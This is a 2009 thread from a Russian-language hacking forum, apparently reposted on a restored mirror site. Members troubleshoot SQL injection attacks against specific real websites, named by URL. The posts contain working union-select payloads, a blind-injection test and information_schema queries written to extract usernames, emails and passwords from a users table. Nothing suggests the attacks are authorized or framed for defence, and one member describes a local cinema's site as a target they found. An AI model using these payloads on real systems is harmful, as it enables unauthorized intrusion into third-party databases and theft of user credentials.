ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2009, 22:35
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.
|
|
|
13.03.2009, 22:43
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от AkyHa_MaTaTa
ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.
Проблема то в том что ошибка не выводится....
А запрос проходит отлично.
Последний раз редактировалось Byrger; 13.03.2009 в 22:52..
|
|
|
|
13.03.2009, 22:52
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
теперь от меня глупый вопрос, что здесь можно придумать
http://ozpp.ru/sovet/lesnyak'/
уж как я не извививался ничего не выходит
|
|
|
|
13.03.2009, 22:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Byrger
А если прописываю так 1'+or+'2 то запрос нормально выполняется...
Как можно попробовать провести инъекцию?
если комментарии поставить не удается. в чем я все таки сомневаюсь. можно работать как со слепой инъекцией
1'+and+substring(version(),1,1)=3+or+'2
Итд
хотя конечно бред ((
конструкция id='1' or '2' - нежизнеспособна.
Последний раз редактировалось geezer.code; 13.03.2009 в 23:15..
|
|
|
|
13.03.2009, 22:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от PaCo
теперь от меня глупый вопрос, что здесь можно придумать
http://ozpp.ru/sovet/lesnyak'/
уж как я не извививался ничего не выходит
тут ничего нет.
зы постом ниже лайт показал инъект, НО в ФФ3 я его не вижу (х_х)
в остальных браузерах ошибки итд. а в фф просто "страница не найдена."
поговорить об этом можно тут https://forum.antichat.ru/thread111019.html
Последний раз редактировалось geezer.code; 14.03.2009 в 15:16..
|
|
|
|
13.03.2009, 23:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от geezer.code
тут ничего нет.
вобщем, http://ozpp.ru/sovet/lesnyak'/**/union/**/select/**/1,2,3,4,5,6,7,user(),9,10,11,12/*
Последний раз редактировалось l1ght; 13.03.2009 в 23:24..
|
|
|
|
14.03.2009, 03:12
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
|
|
|
|
14.03.2009, 03:13
|
|
Новичок
Регистрация: 13.03.2009
Сообщений: 2
Провел на форуме:
4075
Репутация:
0
|
|
http://www.rfbd.ru/
В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273
вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1®ion=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.
Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1& region=72&rubrika=10
И появляется ошибка. Что не так сделал?
|
|
|
|
14.03.2009, 03:23
|
|
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429
Репутация:
66
|
|
Сообщение от EmIL
http://www.rfbd.ru/
В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273
вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1®ion=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.
Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1& region=72&rubrika=10
И появляется ошибка. Что не так сделал?
Таблица находиться в другой БД
|
|
|
|
14.03.2009, 03:27
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от EmIL
http://www.rfbd.ru/
В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273
вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1®ion=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.
Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1& region=72&rubrika=10
И появляется ошибка. Что не так сделал?
Проверил... Там только две ДБ: a1rfbd_ric_datebase и test... Ни в одной jos_users не подходит. А вообще разве это Joomla? Да и папка /administration/ нету. Ищи другие таблицы...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
